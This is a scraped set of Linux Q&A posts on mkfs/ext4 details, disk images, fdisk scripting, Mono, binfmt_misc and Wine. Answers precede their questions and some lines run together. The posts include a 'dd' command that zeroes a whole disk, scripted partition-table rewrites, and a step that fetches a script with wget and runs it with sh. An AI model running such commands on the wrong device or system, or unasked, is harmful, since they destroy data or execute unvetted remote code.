The block size specifies the size that the file-system will use to read and write data. Here the default block size of 4096 bytes is used. The ext3 file system doesn't support block fragmentation so a one byte file will use a whole 4096 block. This can be modified by specifying the -f in the mkfs command but it is not suggested as the file systems today have enough capacity.
Total blocks possible = 912680550400/4096 = 222822400 blocksSo in our command output we have actually got 208234530 blocks which is pretty close to our calculation and because there will always be some blocks that cannot be used.
Total inodes in this example = 208234530/4 = 52058632.5 inodesAs per derobert's comment, the total inodes is the number that mkfs is actually creating. inodes on ext2/3/4 are created at mkfs time. We can change how many it creates with several options (-i, -N) and different -T options do so implicitly.
It is always a heuristic and so the total inodes possible as per our command is 52060160 inodes.
Maximum file system size possible = 4294967296 * 4096 (block size)So theoretically the file system size can be upto 16 TB but however, it is not true.
The size of a block group is specified in sb.s_blocks_per_group blocks, though it can also calculated as 8 * block_size_in_bytes. So total block groups possible could be,
total block groups = 208234530/32768 = 6354.81 So it is close to 6355 groups as per our command output.
Total inodes per group = 32768/4 = 8192 inodesReferences
http://www.redhat.com/archives/ext3-users/2004-December/msg00001.html
https://ext4.wiki.kernel.org/index.php/Ext4_Disk_Layout
https://serverfault.com/a/117598
What is a fragment size in an ext3 filesystem?
|
I was creating a new file system in my external HDD. While formatting, I had to format this partition to the remaining available partition which is somewhere around 850GB. Now, I created an ext3 file system in this partition. This is the output of my mkfs.ext3 command.
mkfs.ext3 /dev/sdb3
mke2fs 1.41.3 (12-Oct-2008)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
52060160 inodes, 208234530 blocks
10411726 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
6355 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968,
102400000Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: doneCan someone help me debug the information as am not clear on what these values actually represent?
| debug mkfs.ext3 command output |
No and yes.
The command to create the filesystem is the one that generates the UUID. So, before running it there is no UUID to use to name the filesystem.
However, it is posible to use an specific UUID to create the filesystem:
$ uuid=$(uuidgen)
$ echo "$uuid"
9a7d78e5-bc6c-4b19-94da-291122af9cf5
$ mkfs.ext4 -U "$uuid" The uuidgen program which is part of the e2fsprogs package
|
is it possible to capture the UUID number before creating file system on disk?
if yes how - by which command ?
blkid ( before run mkfs.ext4 on sdb disk )<no output>blkid ( after run mkfs.ext4 on sdb disk )/dev/sdb: UUID="9bb52cfa-0070-4824-987f-23dd63efe120" TYPE="ext4"Goal - we want to capture the UUID number on the Linux machines disks before creation the file system
| is it possible to capture the UUID number before creating file system on disk |
Typically a device /dev/sdb contains a partition table, not a filesystem. It's each individual partition that would contain a filesystem. However, since your example uses /dev/sdb itself I'll also use that here.
Using your own tune2fs command and looking at the output:
tune2fs -l /dev/sdbit's possible to see by inspection that there is a creation date. For example,
Filesystem created: Fri Jul 1 13:11:44 2016 |
is it possible to understand , when filesystem was created on disk ( date and time )
we try the following ( on sdb disk )
tune2fs -l /dev/sdb | grep time
Last mount time: Mon Aug 1 19:17:48 2022
Last write time: Mon Aug 1 19:17:48 2022but we get only the last mount and last write
what we need is when filesystem created by mkfs command
from lsblk -f we get:
lsblk -f | grep sdbsdb ext4 cc0f5da9-6bbc-42ff-8f5a-847497fd993e /data/sdbso what actually we need is when mkfs was running ( date & time )
| linux + is it possible to understand when filesystem was created on disk |
The labels shown by lsblk (or rather, blkid) in its LABEL column are the file system labels, which are only available on file systems capable of storing a label. A block device with no file system can’t have such a label.
GPT partitions can also be labeled, and lsblk shows that with PARTLABEL. But that’s not an option for whole disks either.
|
we have rhel 7.2 server , server is VM server
and we add new disk - sde
with the following example we create ext file system with label - disk2
mkfs.ext4 -L disk2 /dev/sde
mke2fs 1.42.9 (28-Dec-2013)
/dev/sde is entire device, not just one partition!
Proceed anyway? (y,n) y
Discarding device blocks: done
Filesystem label=disk2
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
262144 inodes, 1048576 blocks
52428 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=1073741824
32 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: doneso we get
lsblk -o +FSTYPE,LABEL | grep sde
sde 8:64 0 4G 0 disk ext4 disk2is it possible to create on new disk only the label but without creation of file system?
example of expected output ( without file system on disk )
lsblk -o +FSTYPE,LABEL | grep sde
sde 8:64 0 4G 0 disk disk2 | how to create disk label without creation filesystem on new disk |
See the parse_fs_type function in mke2fs.c:if a file system type is specified explicitly (using -t), use that
if the tool is running on the Hurd, use “ext2”;
if the program name is mke3fs, use “ext3”;
if the program name is mke4fs, use “ext4”;
if the program name starts with mkfs., use the suffix;
otherwise, use the default defined in /etc/mke2fs.conf, if any;
otherwise, use “ext2”, unless a journal is enabled by default, in which case use “ext3”.The resulting text string is used to find a file system definition in /etc/mke2fs.conf (apart from “ext2” which is handled internally).
So your mkmk would end up using the ext2 file system type.
|
Considering the output from the ls command:
$ ls -l /sbin/mkfs.ext4
lrwxrwxrwx 1 root root 6 Aug 4 00:10 /sbin/mkfs.ext4 -> mke2fs$ type mkfs.ext4
mkfs.ext4 is hashed (/sbin/mkfs.ext4)mkfs.ext4 is a symlink pointing to mke2fs command. Nothing strange, all good and fine. Therefore, running mkfs.ext4is the same as running mke2fs. Notice the curly bracket that I've added in the output of the commands below:
$ mke2fs
Usage: {mke2fs} [-c|-l filename] [-b block-size] [-C cluster-size]
--sinp--
$ mkfs.ext4
Usage: {mkfs.ext4} [-c|-l filename] [-b block-size] [-C cluster-size]
--sinp--Obviously, mke2fs uses the name of the file to determine the appropriate filesystem type to make and even to customize its list of options:
$ ln -s /sbin/mke2fs mkmk$ ls -l mkmk
lrwxrwxrwx 1 direprobs direprobs 12 Aug 8 14:25 mkmk -> /sbin/mke2fs$ ./mkmk
Usage: mkmk [-c|-l filename] [-b block-size] [-C cluster-size]
--sinp--I manged to make an ext2 filesystem using mkmk, the symlink which I've made with ln. What does mkmk mean to mke2fs, it should be nothing!
How does mke2fs use filenames from which it's run to determine the filesystem type to make?
| /sbin/mkfs.fs acts like a binary file even though it's a symbolic link file |
If you're creating a disk image, you need to operate on a file, not on a directory:
# Create a file of some specific size for the new image
truncate -s 10g disk.img# Format the image with a new filesystem
mkfs -t ext4 disk.imgYou can mount the image using the loop mount option:
mount -o loop disk.img /mntNote that the above instructions are for creating a filesystem image. If you want to create a bootable image, you will probably want to partition the file, install a bootloader, etc, which is a slightly more involved process.
|
I know I used to be able to do it, and its frustrating I cant recall.
I want to write an ext4 filesystem to a disk image in a folder. I don't want to re-partition my drive, I just need the filesystem to build an OS in.
I tried $mkdir foo then sudo mkfs.ext4 foo 70000
mke2fs 1.45.5 (07-Jan-2020) warning: Unable to get device geometry for foo foo: Is a directory while setting up superblock
so i think Im missing arguments. I tried reading the man page, and the ol google, but I did not see and example of using mkfs.ext4 to create a new disk image.
| how do I make a new filesystem image? |
It should not not take that long for one single case unless you tell it to zeroise the partition and check for bad sectors (and this is the default at least in my version). It is a good idea to check for bad sectors, but you can skip it with the option -f
sudo mkfs.ntfs -f /dev/zd16 -c 8192 |
On my machine mkfs.ntfs is slow and results in massive use of resources, preventing me from using the machine for anything else. According to top it (or rather directly related zvol processes) is using 80-90% of every thread available, even threads that were already in use by other processes (such as virtual machines).
Is this massive resource use by mkfs.ntfs normal? And if so, is there any way to limit the number of threads that mkfs.ntfs uses? I am thinking that if I could limit it to just a few threads/cores, then other processes would have resources so that I can keep working.
Edit with additional info.
I am using Ubuntu 20.04 as my host OS, and the volume I am formatting is a ZFS zvol. This zvol shares a mirrored VDEV with an ext4 partition, off of which I run Kubuntu.
To make the zvol I ran
sudo zfs create -V 400G -o compression=lz4 -o volblocksize=8k -s nvme-tank/ntfs-zvolAfter the suggestions in the comments, I tried using nice to de-prioritize the command. It helped a little, but still caused extreme lagginess in the VM I was using.
nice -n19 sudo mkfs.ntfs /dev/zd16 -c 8192And this is top. The zvol processes only occur during the mkfs command, so I assume they are directly related.: | massive resource consumption during mkfs.ntfs on a zvol, why (and how can I limit this)? |
Well thanks @krowe. I'm on laptop so can't really use different hard drives. And this particular case was due to misleading information in the installation of Mint 17.
Any way I have found a way to recover all the files i need and will drop a line here what is it all about.
So first i found a live linux usb and start working from it so not to write any data on the 900GB. Then i get this nice tool testdisk. Run it with deeper search and got all the partition stuff i have lost. From there I started to recover all the files on a external HD drive.
for any support on how to use the testdisk - http://forum.cgsecurity.org/phpBB3/
Thanks all for the support.
|
I just installed Linux Mint 17 and when it asked me where to install it I selected the option to overwrite the old Mint 14. Previously I had also windows with NTFS partition of 900GB. Not it is all formatted into ext4 and all the information of almost 800GB is lost.
Please advise what I can do in this situation. It was light format so there should be a way to recover some of the info I have lost. Is it a good idea to format back to NTFS and try some recovery programes or something like HIREN CD?
| How to recover NTFS drive formatted in ext4? |
GRUB2 doesn't currently support the inline_data ext4 feature.
I can't say for sure whether you can disable it at runtime using tune2fs (on an unmounted partition) but you could try.
|
As the title states, grub is unable to recognise my ext4 partition:
GNU GRUB version 2.06-3~deb11u5 Minimal BASH-like line editing is supported. For the first word, TAB
lists possible command completions. Anywhere else TAB lists possible
device or file completions.grub> ls (hd0
Possible partitions are:Device hd0: No known filesystem detected - Sector size 512B - Total size
2097152KiB
Partition hd0,gpt1: No known filesystem detected - Partition start at
131072KiB - Total size 1966063.5KiB
...The disk is using GPT partitioning scheme and the bootloader is the default EFI GRUB2 (grub-efi-amd64-signed) shipped with Debian 11. The partition contains a Linux installation cloned from another disk with rsync -ahPHAXx (as suggested here) (however GRUB doesn't recognise it even when the partition is empty).
On another Linux installation, I am able to mount and browse the above mentioned filesystem and no errors are reported by e2fsck either: /dev/sdb1: clean, 25991/122880 files, 176823/491515 blocks
This ext4 partition has been formatted using the following command:
sudo mkfs.ext4 -v -o 'Linux' -O '^has_journal,resize_inode,^filetype,^64bit,sparse_super2,^huge_file,extra_isize,inline_data' -E 'resize=8388608,root_owner=0:0' -M '/' /dev/sdXYThis issue first occurred on a virtual machine. However, I tried to replicate the same setup on a physical machine by creating a partition of the same size on an existing GPT disk and formatting it with the same options, and trying to ls the disk with different versions of EFI GRUB2 shipped with different distros (CentOS, openSUSE etc.) but always got the same issue (No known filesystem detected).
Can someone point out which of the specified options passed to mkfs is causing the partition not to be recognised by GRUB, but causing no issues in mounting and using on a booted Linux?
| grub does not recognise specially-formatted ext4 partition |
You can't mkdir on a partition.
You need to format (that's not the same as assignment of a partition type) it and mount it first
|
size: 58 GB
contents: unknown
device: /dev/sda4
partition type: basic data
When I ran the format, I selected the type which I expected result in type of Linux.
I found a similar issue from 2019, but fdisk wouldn't run the solution.
The file type may be suitable, but I haven't been able to run 'mkdir' on the partition.
'Files' doesn't see the partition under "Other Locations".
Suggestions welcome.
| /dev/sda4/ on USB stick isn't available after formatting. 'Discs' shows the following: |
Here-document syntax allows you to use fdisk non-interactively:
fdisk /dev/sdb <<EOF
n
pt
b
p
q
EOFBecause this is just an example, I used p and q so no changes are written. Use w after your verified sequence.
Note a blank line corresponds to sole Enter. The point is you can pass your keystrokes this way.
Alternatively you can write those lines (between two EOF-s) to a file, say fdisk.commands, and then:
fdisk /dev/sdb < fdisk.commandsOr without a file (from a comment, thank you Rastapopoulos):
fdisk /dev/sdb <<< $'n\np\n\n\n\nt\nb\np\nq'Another way:
printf '%s\n' "n" "p" "" "" "" "t" "b" "p" "q" | fdisk /dev/sdbThere's also sfdisk. You may find its syntax more suitable for you.
|
I'm using this to wipe a USB flash drive and recreate a FAT filesystem:
dd if=/dev/zero of=/dev/sdb bs=1M #I don't need more advanced wiping
fdisk /dev/sdb
(a few keystrokes to select partition type, etc.)
mkfs.fat /dev/sdb1The fact that I have to manually do a few keystrokes is annoying. How could I do all of this in one step, without any intervention? Something like:
dd if=/dev/zero of=/dev/sdb bs=1M && ??? &&& mkfs.fat /dev/sdb1 | Wipe a USB flash drive and recreate a filesystem |
This is binfmt_misc in action: it allows the kernel to be told how to run binaries it doesn't know about. Look at the contents of /proc/sys/fs/binfmt_misc; among the files you see there, one should explain how to run Mono binaries:
enabled
interpreter /usr/lib/binfmt-support/run-detectors
flags:
offset 0
magic 4d5a(on a Debian system). This tells the kernel that binaries starting with MZ (4d5a) should be given to run-detectors. The latter figures out whether to use Mono or Wine to run the binary.
Binary types can be added, removed, enabled and disabled at any time; see the documentation above for details (the semantics are surprising, the virtual filesystem used here doesn't behave entirely like a standard filesystem). /proc/sys/fs/binfmt_misc/status gives the global status, and each binary "descriptor" shows its individual status. Another way of disabling binfmt_misc is to unload its kernel module, if it's built as a module; this also means it's possible to blacklist it to avoid it entirely.
This feature allows new binary types to be supported, such as MZ executables (which include Windows PE and PE+ binaries, but also DOS and OS/2 binaries!), Java JAR files... It also allows known binary types to be supported on new architectures, typically using Qemu; thus, with the appropriate libraries, you can transparently run ARM Linux binaries on an Intel processor!
Your question stemmed from cross-compilation, albeit in the .NET sense, and that brings up a caveat with binfmt_misc: some configuration scripts misbehave when you try to cross-compile on a system which can run the cross-compiled binaries. Typically, detecting cross-compilation involves building a binary and attempting to run it; if it runs, you're not cross-compiling, if it doesn't, you are (or your compiler's broken). autoconf scripts can usually be fixed in this case by explicitly specifying the build and host architectures, but sometimes you'll have to disable binfmt_misc temporarily...
|
I'm learning C#, so I made a little C# program that says Hello, World!, then compiled it with mono-csc and ran it with mono:
$ mono-csc Hello.cs
$ mono Hello.exe
Hello, World!I noticed that when I hit TAB in bash, Hello.exe was marked executable. Indeed, it runs by just a shell loading the filename!
Hello.exe is not an ELF file with a funny file extension:
$ readelf -a Hello.exe
readelf: Error: Not an ELF file - it has the wrong magic bytes at the start
$ xxd Hello.exe | head -n1
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ..............MZ means it's a Microsoft Windows statically linked executable. Drop it onto a Windows box, and it will (should) run.
I have wine installed, but wine, being a compatibility layer for Windows apps, takes about 5x as long to run Hello.exe as mono and executing it directly do, so it's not wine that runs it.
I'm assuming there's some mono kernel module installed with mono that intercepts the exec syscall/s, or catches binaries that begin with 4D 5A, but lsmod | grep mono and friends return an error.
What's going on here, and how does the kernel know that this executable is special?Just for proof it's not my shell working magic, I used the Crap Shell (aka sh) to run it and it still runs natively.Here's the program in full, since a commenter was curious:
using System;class Hello {
/// <summary>
/// The main entry point for the application
/// </summary>
[STAThread]
public static void Main(string[] args) {
System.Console.Write("Hello, World!\n");
}
} | How is Mono magical? |
If you're really QT gungho and just can't stand any gtk+ stuff on your desktop, you might be out of luck. If you are, on the other hand, not a library-nazi, may I suggest Monodevelop?Monodevelop is an IDE primarily designed for C# and other .NET languages. MonoDevelop enables developers to quickly write desktop and ASP.NET Web applications on Linux, Windows and Mac OSX. MonoDevelop makes it easy for developers to port .NET applications created with Visual Studio to Linux and to maintain a single code base for all platforms.Of course, you can also go write along using Emacs or Vim without any real problems.
|
Currently I don't have a Linux installation with a GUI. All are running text mode. When I do, I usually use KDE. On Windows I am a .NET developer and I haven't done any Mono development, yet. I heard that Monodevelop is only for GNOME.
If you develop Mono on a KDE environment, what IDE do you use?
| What IDE do you use for Mono development on KDE? |
So you're looking for a package containing a file called System.Windows.Forms.dll. You can search:on your machine: apt-file search System.Windows.Forms.dll (the apt-file package must be installed)
online: at packages.ubuntu.com.Both methods lead you to (as of Ubuntu 14.04):libmono-system-windows-forms4.0-cil and
libmono-winforms2.0-cil.Install it with:
sudo apt-get install libmono-system-windows-forms4.0-cil |
I haven't found any concise explanation of this.
| How do I install mono's System.Windows.Forms on Ubuntu? |
When testing Mono/Linux vs .NET/Windows workloads, you have to remember that there is more at play than just the runtime environment.
There are areas in which Linux performs better than Windows (Most IO and network operations tend to be faster for comparable C programs). At the same time, .NET has a more advanced garbage collector and a more advanced JIT compiler.
When it comes to the class libraries, it really depends on what code paths you are using. As JacksonH said on a previous post, you can hit code paths that have been optimized in one implementation, but not on the other, and viceversa.
On ASP.NET workloads you have to remember that the default setup will route all incoming requests to a single "worker" process, mod_mono and Cherokee use a similar approach:(source: mono-project.com)
At least with Apache we support a mechanism where you can divide application workloads across multiple workers, which helps under high loads as it avoids any in-process locking and gives each worker a whole thread pool to work from:(source: mono-project.com)
The details on how to configure this setup are available here:
http://mono-project.com/Mod_mono
|
I am setting up a development server and want to set it up to serve ASP.NET pages using Mono. I am planning on using Cherokee and Mono (http://www.cherokee-project.com/doc/cookbook_mono.html) and wondered if anyone had done any performance testing comparing the Unix based stack to the Windows based.
| Has anyone got any performance numbers comparing IIS and .NET to Cherokee and Mono? |
Bash has no such feature. Zsh does, you can set up aliases based on extensions:
alias -s exe=monoThis would only work in an interactive shell, however, not when a program invokes another.
Under Linux, you can set up execution of foreign binaries through the binfmt_misc mechanism; see Rolf Bjarne Kvinge. Good Linux distributions set this up automatically as part of the mono runtime package.
If you can't use binfmt_misc because you don't have root permissions, you'll have to settle for wrapper scripts.
#!/bin/sh
exec /path/to/mono "$0.exe" "$@"Put the wrapper script in the same directory as the .exe file, with the same name without .exe.
|
Without any DE or even X, I want to use ./my.exe to run mono my.exe, like it works with python scripts.
| How to set bash to run *.exe with mono? |
From the What's New In PowerShell Core 6.0 documentation, in the "Backwards Compatibility" section:Most of the modules that ship as part of Windows (for example,
DnsClient, Hyper-V, NetTCPIP, Storage, etc.) and other Microsoft
products including Azure and Office have not been explicitly ported to
.NET Core yet. The PowerShell team is working with these product
groups and teams to validate and port their existing modules to
PowerShell Core. With .NET Standard and CDXML, many of these
traditional Windows PowerShell modules do seem to work in PowerShell
Core, but they have not been formally validated, and they are not
formally supported.While Powershell Core is GA, it is still very much a work in progress.
|
Why is Resolve-DnsName not recognized for PowerShell Core? So far as I recall it works fine with PowerShell itself.
Is this a .NET versus dotnet problem? That dotnet simply doesn't have this functionality?
thufir@dur:~/powershell/webservicex$
thufir@dur:~/powershell/webservicex$ dotnet --version
2.1.4
thufir@dur:~/powershell/webservicex$
thufir@dur:~/powershell/webservicex$ ./dns.ps1
Resolve-DnsName : The term 'Resolve-DnsName' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At /home/thufir/powershell/webservicex/dns.ps1:3 char:1
+ Resolve-DnsName -Name localhost -Type ANY | Format-Table -AutoSize
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Resolve-DnsName:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundExceptionthufir@dur:~/powershell/webservicex$
thufir@dur:~/powershell/webservicex$ cat dns.ps1
#!/usr/bin/pwsh -CommandResolve-DnsName -Name localhost -Type ANY | Format-Table -AutoSizethufir@dur:~/powershell/webservicex$ see closed question also, and technet.
| Resolve-DnsName : The term 'Resolve-DnsName' is not recognized as the name of a cmdlet |
Mono does not support AIX.
If you want to try to port Mono to AIX, you would probably want to:Turn on the manual checking of dereferences in Mono, as AIX keeps the page at address zero mapped, preventing a whole class of errors from being caught. I forget the name of the define, but it was introduced some six months ago.
You would have to make sure that your signal handlers work, and that exception unwinding works on your platform.The rest is probably replacing a few Posix functions with some AIX equivalents, but if you get the two above working, you would likely have a working Mono installation. But neither one of those tasks is easy.
|
I don't have root access to an AIX 5.2 machine and want to run Mono programs in it.
| How to install Mono in AIX? |
You have three options:
1) Emulation (Wine, Crossover Linux, Bordeaux)
2) Virtualization (VMware Player or VMware Workstation, Parallels Desktop, Oracle Virtualbox)
3) Dual Boot
For C# development on Linux, Mono Project is the way to go. You can develop in MonoDevelop IDE and connect to SQL Server hosted in a virtual machine using SQL Client (for more info see: Mono/ADO.NET, Mono/ODBC, Mono/Database Access)
For more information about Mono have a look at the Start page: http://mono-project.com/Start and Mono FAQ Technical, Mono FAQ General, Mono ASP.NET FAQ, Mono WinForms FAQ, Mono Security FAQ
Also see their Plans and Roadmap
Thanks to the Mono project you can even build apps with C# for Apple devices using Monotouch or for Android using Monodroid.
Also if you want to have the latest version of Mono and tools I recommend using openSUSE because thats the first place where you'll find the latest updates, Mono being a project backed by Novell which is the company that also sponsors openSUSE distribution.
EDIT: (Completing the Office part of the question)
// Office suites //
1) IBM Lotus Symphony -> http://symphony.lotus.com/software/lotus/symphony/home.nsf/home
2) Oracle OpenOffice -> http://www.oracle.com/us/products/applications/open-office/index.html
3) OpenOffice.org -> http://www.openoffice.org/
4) GNOME Office -> http://live.gnome.org/GnomeOffice
5) Go-oo.org -> http://go-oo.org/
6) SoftMaker Office -> http://www.softmaker.com/english/ofl_en.htm
7) KOffice -> http://www.koffice.org/
// Online Office suites //
0) Microsoft Office Online -> http://www.officelive.com/en-us/
1) Google Apps -> http://docs.google.com/
2) Zoho -> http://www.zoho.com/
3) ThinkFree -> http://thinkfree.com
4) Live-Documents -> http://www.live-documents.com/
5) Ajax13 -> http://us.ajax13.com/en/
6) ContactOffice -> http://www.contactoffice.com/
7) FengOffice -> http://www.fengoffice.com/web/
8) Zimbra -> http://www.zimbra.com/
| I want to start working with linux, and I know I should work in that regularly to improve myself.
I work with sql server, office, c# at the company. can I install and do my tasks in linux (i.e. red hat)?
| Can I work with Sql Server, Office and C# using Linux? |
MonoDevelop 4.2.2 supports Visual Studio 2013 Solutions normally, but you will need change ToolsVersion in your projects. Open each one of the projects in your solution, but open using a text editor your .csproj file and change ToolsVersion="12.0" to ToolsVersion="4.0",
|
My Toshiba Laptop had started running slow recently and, quite frankly, I was tired of Windows 8, so I created a USB of the most recent version of Linux Mint and installed it, moving all my needed projects to GitHub.
I installed MonoDevelop because I know of its tendency for WinForms, but when I try opening the .sln file it opens it in a text editor in MonoDevelop rather than as a solution. I have two major Solutions I need to develop Yahtzee and GemsCraft.
How do I open these solutions in MonoDevelop? Yahtzee is in VisualBasic and GemsCraft is in C#
| How to Open Visual Studio 2013 Solution in MonoDevelop |
Most of this comes from http://wiki.phonicuk.com/Installing-Mono-in-CentOS-5-x.ashx
1) Satisfy the dependencies before compiling mono
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
rpm -Uvh epel-release-6-8.noarch.rpm
yum install bison gettext glib2 freetype fontconfig libpng libpng-devel \
libX11 libX11-devel glib2-devel libgdi* libexif glibc-devel urw-fonts \
java unzip gcc gcc-c++ automake autoconf libtool make bzip2 wget2) compile mono
cd ~
wget http://download.mono-project.com/sources/mono/mono-2.10.8.tar.gz
tar zxvf mono-2.10.8.tar.gz
cd mono-2.10.8
./configure --prefix=/usr/local
make3) install mono
make install |
Does anyone know how to install Mono and MonoDevelop on a Redhat 6.5 Workstation?
I've tried a number of different things but nothing has worked. I tried using git and building with make from the mono website but it didn't build.
| Install mono and Monodevelop on a new Redhat 6.5 Workstation |
{
my-mono-app 2>&1 >&3 3>&1 | awk '
{print}
/ref unused/ {print "Exiting."; exit(1)}' >&2
} 3>&1awk would exit as soon as it reads one of those messages, causing my-mono-app to be killed by a SIGPIPE the next time it tries to write something on stderr.
Don't use mawk there which buffers stdin in a stupid way (or use -W interactive there).
If the application doesn't die on SIGPIPE, you'll have to kill it in some way.
One way could be:
{ sh -c 'echo "$$" >&2; exec my-mono-app' 2>&1 >&3 3>&1 | awk '
NR == 1 {pid = $0; next}
{print}
/ref unused/ && ! killed {
print "Killing",pid
killed=1
system("kill " pid)
}' >&2
} 3>&1Replace with "kill " with "kill -s KILL " if it still doesn't work.
|
I have a task that runs written in Mono, however sometimes (randomly) the Mono runtime will hang after the task is complete and just print:
_wapi_handle_ref: Attempting to ref unused handle 0x2828
_wapi_handle_unref_full: Attempting to unref unused handle 0x2828
_wapi_handle_ref: Attempting to ref unused handle 0x2828
_wapi_handle_unref_full: Attempting to unref unused handle 0x2828
...to stderr forever. Is there a way of parsing stderr and killing the task when a certain pattern is matched?
A timeout is out of the question because the task can legitimately take upwards of an hour to complete normally, but if there is no work to be done will exit instantly (or at least it's supposed to).
| Stop a task based on output |
Easiest way to install .NET 4.0 is to use the newest Winetricks script:
$ wget https://raw.githubusercontent.com/Winetricks/winetricks/master/src/winetricks
$ sh winetricks dotnet40Also, if you have 64-bit wine installed, you will need to use newer .NET 4.5 (dotnet45) instead of 4.0.
|
I am using fedora 23 and I want to install .NET framework 4 in wine.
based on here, I have to remove mono first. But when I run the following command I receive unsuccessful result.
$ wine uninstaller --remove '{E45D8920-A758-4088-B6C6-31DBB276992E}'
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:winediag:start_process Wine Staging 1.7.55 is a testing version containing experimental patches.
fixme:winediag:start_process Please mention your exact version when filing bug reports on winehq.org.
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
uninstaller: The application with GUID '{E45D8920-A758-4088-B6C6-31DBB276992E}' was not foundRemoving wine-mono package removes main wine packages too.
Please tell me how can I remove mono?
| How to install wine with .NET framework instead of mono? |
MonoServerPath example.com "/usr/bin/mod-mono-server4"should probably be
MonoServerPath mydomain.org "/usr/bin/mod-mono-server4" |
I know I'm running mono-apache-server4 but when I launch the site mono-apache-server2 is responding.
Why is my site not using 4.0?
See htop:This is what I did:
Installed Debian Wheezy along with apache and mod-mono:
apt-get install mono-apache-server2 mono-apache-server4 libapache2-mod-mono libmono-i18n2.0-cilThen I edited the default virtual host file: sudo nano /etc/apache2/sites-available/default
<VirtualHost *:80>
ServerName mydomain.org
ServerAdmin [emailprotected]
ServerAlias www.mydomain.org
DocumentRoot /var/www/mydomain.org/
ErrorLog /var/www/logs/mydomain.org.error.log
CustomLog /var/www/logs/mydomain.org.access.log combined MonoServerPath example.com "/usr/bin/mod-mono-server4" MonoDebug mydomain.org true
MonoSetEnv mydomain.org MONO_IOMAP=all
MonoApplications mydomain.org "/:/var/www/mydomain.org/"
<Location "/">
Allow from all
Order allow,deny
MonoSetServerAlias mydomain.org
SetHandler mono
SetOutputFilter DEFLATE
SetEnvIfNoCase Request_URI "\.(?:gif|jpe?g|png)$" no-gzip dont-vary
</Location>
<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/javascript
</IfModule>
</VirtualHost>And restarted apache2:Update:
I reinstalled using:
apt-get install mono-apache-server4 libapache2-mod-mono libmono-i18n4.0-allBut Jim's answer was the culprit.
| apache virtualhost using mono-apache-server2 not mono-apache-server4 |
No, Paint.NET will not run on Mono.
There was some (currently abandoned) effort to port it to non-Windows systems.
Also, it has inspired Pinta, a project which is supposed to be drop-in replacement for Paint.NET on non-Windows systems.
|
I tried downloading and running the Paint.NET installer under mono and got:Cannot open assembly 'Paint.NET.3.5.8.Install.exe':
File does not contain a valid CIL image.Can this be installed using mono?
If it matters, I'm running Ubuntu.
| Can I install Paint.Net on linux using mono? |
As hinted by https://packages.qa.debian.org/m/mod-mono/news/20140104T163913Z.html, the problem was https://bugs.debian.org/731374, which is fixed in unstable, in version 3.8-1 as you can see as the end of the bug thread. So if you want to use the unstable version on Jessie, you can. No reason not to.
In case it isn't obvious, the bug was not fixed in time before the freeze, so therefore this package was removed from Jessie and not reinstated in time.
However, note that
(a) you probably want to use all the binary packages corresponding to the xsp source package
(b) depending on ABI changes, you may need to rebuild them on your Jessie system.
|
I would like to run an ASP.net MVC application that requires Mono 4 on Debian Jessie, but Jessie is missing the required package "libapache2-mod-mono" [1]. On [2] I found that the package was removed from Jessie some time ago (2014-01-04), according to [3] because a file named "mono.load" is missing (in Wheezy (stable) and sid (unstable), the required file has the name "mod_mono.load" and at least in Wheezy that works).
Which way should I go now in order to get that issue solved? Should I install libapache2-mod-mono etc. from sid (unstable), similar to [4]? Is it clever to download and compile that package and then put the output files to a production system? Or is there a way I can help out and get libapache2-mod-mono back in Jessie? Should I possibly report the problem to someone?
[1] https://packages.debian.org/search?keywords=libapache2-mod-mono
[2] https://packages.qa.debian.org/m/mod-mono.html
[3] https://lintian.debian.org/maintainer/[emailprotected]#mod-mono
[4] How to install a single Jessie package on Wheezy?
| How to run mod_mono on Debian Jessie (package libapache2-mod-mono missing)? |
Okay, it works. I don't have a very precise answer to the exact question of why the autostart did not work other than noting the difference of: .sh file does not work, application directly does work.
What I did now:
After deleting the old .desktop files in autostart folder, I created the one:
$ nano ~/.config/autostart/MyAppName.desktopInserted this:
[Desktop Entry]
Exec=mono /full/path/to/mono_c#/gui/app/myappname.exe
Path=/full/path/to/working/directory
Name=MyAppName
Type=Application
Version=1.0Note: the executable here for "Exec", found via the path variable, is mono, and its command line arg is the path to the "executable" which runs on the mono framework.
This works as supposed. Reboot -> app starts.
